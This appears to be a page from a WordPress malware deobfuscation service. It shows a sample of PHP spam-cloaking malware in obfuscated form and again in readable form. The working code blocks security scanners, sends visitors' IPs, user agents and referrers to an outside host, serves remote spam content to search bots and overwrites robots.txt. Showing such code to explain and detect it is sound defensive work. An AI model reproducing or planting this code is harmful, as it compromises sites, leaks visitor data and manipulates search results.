Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $cfyk='ht';$eljo='h';$homk='cw14';$wvxi='earingtell.com/';$gbuq='tp://';$giun='60.';$jrtko=$cfyk.$gbuq.$homk.$giun.$eljo.$wvxi; $pc = "VQcBAwA"; $bagent = "Google|Yahoo|Docomo|Bing"; error_reporting(0); if(preg_match("/(petalBot|Java|Python|indy Library|mj12bot|Go-http-client|swiftbot|Jaunty|yandexBot|feedDemon|DotBot|ezooms|AskTbFXTV|HttpClient|OBot|scrapy|Barkrowler|SeznamBot|heritrix|Paloaltonetworks|AhrefsBot|Feedly|DataForSEO|EasouSpider|YySpider|digExt|python-urllib|LightDeckReports Bot|CrawlDaddy|ZmEu|CensysInspect|YisouSpider|amazonBot|SemrushBot|ApacheBench|UniversalFeedParser|Python-requests|jikeSpider|coolpadWebkit|bytespider|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit(); } $refer = urlencode(@$_SERVER['HTTP_REFERER']); $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $ip = $_SERVER['REMOTE_ADDR']; if (isset($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if ((!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https') or (!empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') or (!empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443') or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if(strpos($uri,"mldmld") !== false){echo "ok";exit();} $mld = 0; $mldFilePath = "mld.txt"; if(!is_file($mldFilePath)) { $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/mldmld'; $pdjc = @file_get_contents($uuu); if($pdjc === "ok") { $mld = 1; writeToFile($mldFilePath,"1"); } else { $mld = 0; writeToFile($mldFilePath,"0"); } } else { $mld = readFromFile($mldFilePath); } function writeToFile($filePath, $content) { $file = fopen($filePath, "w"); if ($file) { fwrite($file, $content); fclose($file); return true; } return false; } function readFromFile($filePath) { $file = fopen($filePath, "r"); if ($file) { $content = fread($file, filesize($filePath)); fclose($file); return $content; } return false; } if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"robots.txt") !== false or strpos($uri,"pingsitemap") !== false or strpos($uri,"jp2023") !== false or preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI']) or preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $jrtko."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$mld&script=$script"; $robots_contents = ""; if(strpos($uri,"pingsitemap") !== false) { $scripname = $_SERVER['SCRIPT_NAME']; if(strpos($scripname,"index.ph") !== false) { if($mld == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname = $scripname.'?'; } $robots_contents = "User-agent: *\r\nAllow: /"; $sitemap = "$http://" . $domain .$scripname. "sitemap.xml"; $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; $sitemapstatus = ""; echo $sitemap.": ".$sitemapstatus.'<br/>'; $requsturl = $jrtko."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$mld&script=$script&sitemap=".urlencode($sitemap); } $pdjc = @file_get_contents($requsturl); if(empty($pdjc)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $requsturl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $pdjc = curl_exec($ch); curl_close($ch); } if(!empty($pdjc)) { if(substr($pdjc,0,10)=="error code"||$pdjc == "500") { header("HTTP/1.0 500 Internal Server Error"); exit(); } if(strpos($uri,"jp2023") !== false){header('HTTP/1.1 404 Not Found');} else if(substr($pdjc,0,5)=="<?xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $pdjc; if(!empty($robots_contents)){writeToFile("robots.txt",$robots_contents);} else if(strpos($uri,"robots.txt") !== false){writeToFile("robots.txt",$pdjc);} exit(); return; } }else{ } ?><?php
$cfyk = 'ht';
$eljo = 'h';
$homk = 'cw14';
$wvxi = 'earingtell.com/';
$gbuq = 'tp://';
$giun = '60.';
$jrtko = "http://cw1460.hearingtell.com/";
$pc = "VQcBAwA";
$bagent = "Google|Yahoo|Docomo|Bing";
error_reporting(0);
if (preg_match("/(petalBot|Java|Python|indy Library|mj12bot|Go-http-client|swiftbot|Jaunty|yandexBot|feedDemon|DotBot|ezooms|AskTbFXTV|HttpClient|OBot|scrapy|Barkrowler|SeznamBot|heritrix|Paloaltonetworks|AhrefsBot|Feedly|DataForSEO|EasouSpider|YySpider|digExt|python-urllib|LightDeckReports Bot|CrawlDaddy|ZmEu|CensysInspect|YisouSpider|amazonBot|SemrushBot|ApacheBench|UniversalFeedParser|Python-requests|jikeSpider|coolpadWebkit|bytespider|GPTBot)/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 403 Forbidden');
exit;
}
$refer = urlencode(@$_SERVER['HTTP_REFERER']);
$uagent = urlencode($_SERVER['HTTP_USER_AGENT']);
$language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
$ip = urlencode($ip);
$domain = urlencode($_SERVER['HTTP_HOST']);
$script = urlencode($_SERVER['SCRIPT_NAME']);
if (!empty($_SERVER['REQUEST_SCHEME']) and $_SERVER['REQUEST_SCHEME'] == 'https' or !empty($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on' or !empty($_SERVER['SERVER_PORT']) and $_SERVER['SERVER_PORT'] == '443' or isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') {
$_SERVER['REQUEST_SCHEME'] = 'https';
} else {
$_SERVER['REQUEST_SCHEME'] = 'http';
}
$http = urlencode($_SERVER['REQUEST_SCHEME']);
$uri = urlencode($_SERVER['REQUEST_URI']);
if (strpos($uri, "mldmld") !== false) {
echo "ok";
exit;
}
$mld = 0;
$mldFilePath = "mld.txt";
if (!is_file($mldFilePath)) {
$uuu = $http . '://' . $_SERVER['HTTP_HOST'] . '/mldmld';
$pdjc = @file_get_contents($uuu);
if ($pdjc === "ok") {
$mld = 1;
writeToFile($mldFilePath, "1");
} else {
$mld = 0;
writeToFile($mldFilePath, "0");
}
} else {
$mld = readFromFile($mldFilePath);
}
function writeToFile($filePath, $content)
{
$file = fopen($filePath, "w");
if ($file) {
fwrite($file, $content);
fclose($file);
return true;
}
return false;
}
function readFromFile($filePath)
{
$file = fopen($filePath, "r");
if ($file) {
$content = fread($file, filesize($filePath));
fclose($file);
return $content;
}
return false;
}
if (strpos($uri, "favicon.ico") !== false) {
} else {
if (strpos($uri, "robots.txt") !== false or strpos($uri, "pingsitemap") !== false or strpos($uri, "jp2023") !== false or preg_match("@^/(.*?).xml\$@i", $_SERVER['REQUEST_URI']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_USER_AGENT']) or preg_match("/({$bagent})/i", $_SERVER['HTTP_REFERER'])) {
$requsturl = $jrtko . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$mld}&script={$script}";
$robots_contents = "";
if (strpos($uri, "pingsitemap") !== false) {
$scripname = $_SERVER['SCRIPT_NAME'];
if (strpos($scripname, "index.ph") !== false) {
if ($mld == 0) {
$scripname = '/?';
} else {
$scripname = '/';
}
} else {
$scripname .= '?';
}
$robots_contents = "User-agent: *\r\nAllow: /";
$sitemap = "{$http}://" . $domain . $scripname . "sitemap.xml";
$robots_contents = trim($robots_contents) . "\r\n" . "Sitemap: {$sitemap}";
$sitemapstatus = "";
echo $sitemap . ": " . $sitemapstatus . '<br/>';
$requsturl = $jrtko . "?agent={$uagent}&refer={$refer}&lang={$language}&ip={$ip}&dom={$domain}&http={$http}&uri={$uri}&pc={$pc}&rewriteable={$mld}&script={$script}&sitemap=" . urlencode($sitemap);
}
$pdjc = @file_get_contents($requsturl);
if (empty($pdjc)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $requsturl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
$pdjc = curl_exec($ch);
curl_close($ch);
}
if (!empty($pdjc)) {
if (substr($pdjc, 0, 10) == "error code" || $pdjc == "500") {
header("HTTP/1.0 500 Internal Server Error");
exit;
}
if (strpos($uri, "jp2023") !== false) {
header('HTTP/1.1 404 Not Found');
} else {
if (substr($pdjc, 0, 5) == "<?php xml") {
header('Content-Type: text/xml; charset=utf-8');
} else {
header('Content-Type: text/html; charset=utf-8');
}
}
echo $pdjc;
if (!empty($robots_contents)) {
writeToFile("robots.txt", $robots_contents);
} else {
if (strpos($uri, "robots.txt") !== false) {
writeToFile("robots.txt", $pdjc);
}
}
exit;
}
} else {
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.